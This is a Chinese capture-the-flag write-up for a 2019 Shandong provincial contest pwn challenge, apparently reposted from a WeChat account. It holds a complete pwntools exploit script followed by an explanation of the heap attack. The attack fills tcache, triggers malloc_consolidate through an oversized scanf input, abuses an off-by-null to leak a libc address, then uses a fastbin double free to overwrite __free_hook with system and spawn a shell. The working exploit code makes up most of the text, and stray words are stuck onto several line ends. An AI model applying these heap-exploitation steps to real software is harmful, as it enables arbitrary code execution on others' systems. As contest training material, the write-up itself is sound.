2019山东省省赛的第三道 PWN 题目python
题目连接: linux
https://pan.baidu.com/s/17FK07Z0MQUGHB52rm8Ss4Aweb
提取码: isy6ubuntu
参考:微信
https://wzt.ac.cn/2019/11/04/sdnisc2019编辑器
完整 EXP:url
# encoding=utf-8
from pwn import *
#context.log_level = 'debug'
p = process("./pwn")
elf = ELF("./pwn")
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def add(index,leng,content):
p.sendlineafter("Your choice: ","1")
p.sendlineafter("Index: ",str(index))
p.sendlineafter("note len: ",str(leng))
p.sendlineafter("content: ",content)
def check(index):
p.sendlineafter("Your choice: ","2")
p.sendlineafter("Index: ",str(index))
def delete(index):
p.sendlineafter("Your choice: ","3")
p.sendlineafter("Index: ",str(index))
for i in range(25):
add(i,0x78,'aaaa'+str(i))#0-24
for i in range(7):
delete(i)#0-6
delete(10)
delete(11)
delete(12)
delete(13)
delete(14)
delete(15)
p.sendlineafter("Your choice: ",'1'*0x600)
p.sendlineafter("Index: ","50")# >31
for i in range(7):
add(i,0x78,'bbbb'+str(i))#0-6
add(25, 0x78, '25'+"b" * 0x76)#off by null 0x280->0x200
add(26, 0x78, '26'+"b" * 0x6e)
add(27, 0x78, '27'+"b" * 0x6e)
add(28, 0x78, '28'+"b" * 0x6e)
add(29, 0x78, '29'+"b" * 0x6e)
add(30, 0x78, "/bin/sh\x00")
for i in range(7):
delete(i)#0-6 tcache
delete(16)
delete(26)
p.sendlineafter("Your choice: ",'1'*0x600)
p.sendlineafter("Index: ","50")# >31
for i in range(7):
add(i, 0x78, "tcache"+str(i)) # clear tcache
add(31, 0x78, "aaaa31")
p.recvuntil("Your choice: ")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline("27")
p.recvuntil("Content: ")
libc_addr = u64(p.recv(6).ljust(8, '\x00')) - 96 - 0x3ebc40
free_hook = libc_addr + libc.symbols['__free_hook']
system = libc_addr + libc.symbols["system"]
add(10, 0x78, "aaaa10")
delete(10)
delete(27)
add(10, 0x78, p64(free_hook))
add(11, 0x78, p64(free_hook))
add(12, 0x78, p64(system))
p.recvuntil("Your choice: ")
p.sendline("3")
p.recvuntil("Index: ")
p.sendline("30")
p.interactive()
这个题目配了个 libc 2.27 的,因此应该是在 ubuntu 18 下的spa
限制了 size 的大小要小于等于 0x78,存在 off by null.net
首先把 tcache 填满,接下来 free 的那些就会放到 fastbin 中了debug
若是 scanf 读入的是一个很大的数的话他就会去申请一块空间,若是这个空间申请的足够大就能触发 malloc_consolidate,从而合并 fastbin 放到 unsorted bin 中去
因此,咱们在 scanf 的时候去发送很大的一个数好比 '1'*600 就能让前面那些 fastbin 合并
再把以前放在 tcache 中的申请回来,而后去申请一个 chunk,正常状况应该是:把 unsorted bin 中那块 0x300 分红 0x80 与 0x280,可是若是所有写上加上后面那个 off by null 就会把 0x280 的 size 给改掉,改成 0x200
而后把那 0x200 申请掉,再申请的话就从 top chunk 中划分了(/bin/sh 那个),可是此时图中 aaaa16 那里的 prev_size 依然是 0x280
这时候先把 tcache 填满了,再去 free 掉 aaaa16 那个,而后再次触发 malloc_consolidate 就会再给咱们一个 0x300 大小的 free chunk(aaaa16 跟它前面那块)
先把 tcache 中的都申请完,而后再去申请一个,如今再去 check index27 的就能泄露出 unsorted bin 的地址
而后申请一个 index10,这时候正好申请到 index27 那里,那么接下来就是 fastbin double free 了,能够对着这个释放两次,一次 free(index27),一次 free(index10),而后把 free_hook 改成 system 的地址,而后去 free(index30) 也就是前面写入 /bin/sh 的那一个 chunk
本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。